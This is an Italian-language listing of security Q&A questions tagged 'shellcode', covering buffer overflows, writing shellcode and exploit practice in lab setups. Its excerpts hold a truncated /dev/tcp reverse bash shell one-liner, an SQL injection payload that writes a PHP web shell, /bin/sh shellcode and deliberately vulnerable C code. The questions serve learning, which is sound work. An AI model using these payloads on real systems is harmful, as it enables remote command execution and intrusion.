Domande con tag 'shellcode'

3
risposte

La scrittura di shellcode è ancora un'abilità valida per avere / imparare?

Seguito da questa domanda: Dovrei preoccuparmi del buffer di insegnamento overflow altro? Sono un ricercatore di informatica e anche istruttore di corsi di sicurezza. Recentemente sono state poste domande sulla validità dell'overflow del bu...
posta 08.05.2013 - 19:31
1
risposta

Ha importanza in quale linguaggio di programmazione scrivi lo shellcode?

Ho cercato molto e non ho trovato nulla. Mi chiedo ancora: è importante in quale lingua scrivi shellcode? Lo shellcode in Assembly, C, ecc. Funziona ovunque possa essere usato ed è buono come l'altro?     
posta 10.12.2017 - 16:53
2
risposte

Cosa si nasconde dietro questo complicato shellcode su linux?

È praticamente la prima volta che utilizzo un exploit di buffer overflow. Ho scritto un semplice programma C vulnerabile ai buffer overflow: #include <stdio.h> #include <stdlib.h> #include <string.h> void main() { char*...
posta 17.03.2017 - 12:45
1
risposta

Reverse Bash Shell una fodera

So che quando viene eseguito il codice seguente viene creata una shell bash inversa dal computer della vittima al computer dell'aggressore. Qualcuno può spiegarmi il significato del numero "196"? 0<&196;exec 196<>/dev/tcp/<y...
posta 03.08.2017 - 01:18
2
risposte

Come gestire l'Errcode 13 di MySQL quando si tenta di scrivere una shell

La mia macchina d'attacco sta eseguendo Kali e il server esegue CentOS 6.4 con DVWA. Sto provando a scrivere una shell tramite un'iniezione SQL. Il carico utile è ' UNION SELECT '', '<?PHP system($_GET["cmd"]); ?>' INTO OUTFILE '/v...
posta 29.06.2013 - 19:53
1
risposta

Overflow del buffer sul server

Ho un server, per riferimento: pastebin / ghJX69uH, che posso usare netcat e ti chiederà di inserire un msg. So che è vulnerabile all'overflow del buffer, ma non riesco a ottenere l'esecuzione dello shellcode. Ho corretto con successo l'indir...
posta 20.03.2017 - 18:02
1
risposta

Che cosa significa mov qword rbx, '// bin / sh'?

Seguo questo tutorial per capire come funziona lo shellcode a 64 bit. Quindi, codifico questo shellcode e funziona: BITS 64 xor rax, rax mov qword rbx, '//bin/sh' shr rbx, 0x8 push rbx mov rdi, rsp push rax mov rdx, rsp push rdi mov rsi,...
posta 31.12.2016 - 17:11
1
risposta

Dove è possibile eseguire shellcode all'interno di un processo ordinario, qual è un modo furtivo per sfruttare il codice offensivo di Powershell?

Al momento, l'uso offensivo di Powershell è uno degli argomenti più scottanti in infosec. Gli script di PowerShell sono spesso proposti come appropriati per la fase di "post-sfruttamento" di una penetrazione. Questa domanda segue in qualche modo...
posta 16.12.2016 - 13:15
1
risposta

Può cambiare il flusso del programma ma non può eseguire shellcode

Ho creato un piccolo programma C vulnerabile, che normalmente non chiamerà la funzione overflow. void overflowed(){ printf("%s\n","Hijacked"); } void normally(char * st){ char buffer[80]; strcpy(buffer,st); } int ma...
posta 29.12.2017 - 17:41
0
risposte

programma C - programma exploit (dopo l'errore seg)

Il programma seguente accetta tre parametri: Base da convertire da , base da convertire in e il numero da convertire in binario Come parte della sicurezza dell'apprendimento - sto provando a tamponare questo programma. Sono riuscito a ot...
posta 28.02.2016 - 16:03